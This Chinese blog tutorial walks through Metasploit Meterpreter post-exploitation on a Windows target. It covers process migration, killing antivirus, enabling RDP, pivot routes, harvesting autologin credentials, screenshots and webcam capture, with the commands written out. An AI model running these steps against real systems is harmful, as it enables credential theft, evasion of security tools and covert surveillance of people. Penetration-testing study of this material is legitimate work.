0x00 前言
成功对目标机器进行渗透后还可以做什么?? Metasploit 提供了一个非常强大的后渗透工具——mterpreter ,该工具具有多重功能,使后渗透入侵变得更容易。后期渗透模块有200多个,mterpreter 有以下优势。
- 纯内存工作模式,不需要对磁盘进行任何写入操作
- 使用加密通信协议,而且可以同时与几个信道通信
- 在被攻击进程内工作,不需要创建新的进程
- 易于在多进程之间进行迁移
- 平台通用,适用于Windows 、LINUX、BSD系统,并支持 Intelx86 和 Intelx64平台。
0x01 进程迁移:
在刚获得 mterpreter shell 时,该shell 是及其脆弱和易受攻击的,例如攻击者利用浏览器漏洞攻陷目标服务器,但是攻击渗透后浏览器可能被用户关闭。所以我们要进一步移动shell ,把shell 与稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作。
使用 ps 命令获取目标正在运行的进程:
输入 getpid 命令查看 Meterpreter shell 的进程号
可以看到Meterpreter shell 进程的 PID 是 2460, 输入 migrate 命令,把shell 移动到 erplorer进程里 ,因为 Explorer 是一个稳定的进程。
可以看到进程已经迁移成功,迁移完成之后原来的shell 的 pid 进程会自动关闭,如果没有关闭可以输入 kill PID 命令,杀掉该进程。
我们还可以使用自动迁移命令( run post/windows/manage/migrate) ,系统会自动寻找合适的进程然后迁移。
0x02 系统命令:
获得了稳定的进程后,接下来收集系统信息,首先输入 sysinfo 查看目标主机的系统信息,例如操作系统和体系结构。
0x02—1 查看目标主机是否运行在虚拟机上
输入 run post/windows/gather/checkvm 命令检查目标主机是否允许在虚拟机上
0x02—2 查看目标主机是否运行
输入idletime 命令 查看目标主机的运行时间
0x02—3 查看目标主机完整的网络设置
0x02—4 查看目标主机的用户名
输入background 命令将当前会话放到后台。
0x02—5 关闭目标主机系统杀毒软件
输入run post/windows/manage/killav 关闭目标杀毒软件
0x02—6 启动目标主机的远程桌面协议
命令: run post/windows/manage/enable_rdp
0x02—7 查看目标主机的本地子网信息,添加路由
命令: 192.168.124.0/255.255.255.0
run autoroute -s xxxxx 添加路由
run autoroute -p 查看路由添加情况
0x02—8 枚举目标系统已经登录的用户
命令:run post/windows/gather/enum_logged_on_users
0x02—9 枚举安装在目标机上的应用程序
命令:run post/windows/gather/enum_applications
0x02—10 抓取自动登录的用户名和密码
命令: run post/windows/gather/credentials/windows_autologin
0x02—11 抓取目标主机的屏幕截图
此时没有抓到任何信息,需要用到扩展插件 Espia ,使用前需要 load espia 加载插件,输入 screengrab 或者screenshot 抓取目标主机的屏幕截图。
0x02—12 查看目标主机的摄像头
命令:
- webcam_list 查看主机的摄像头
- webcam_snap 打开目标主机摄像头拍照
- webcam_stream 开启摄像头直播模式
使用shell 命令进入目标机的 shell 下, 使用 exit 返回 meterpreter
若有收获,就点个赞吧
0 人点赞
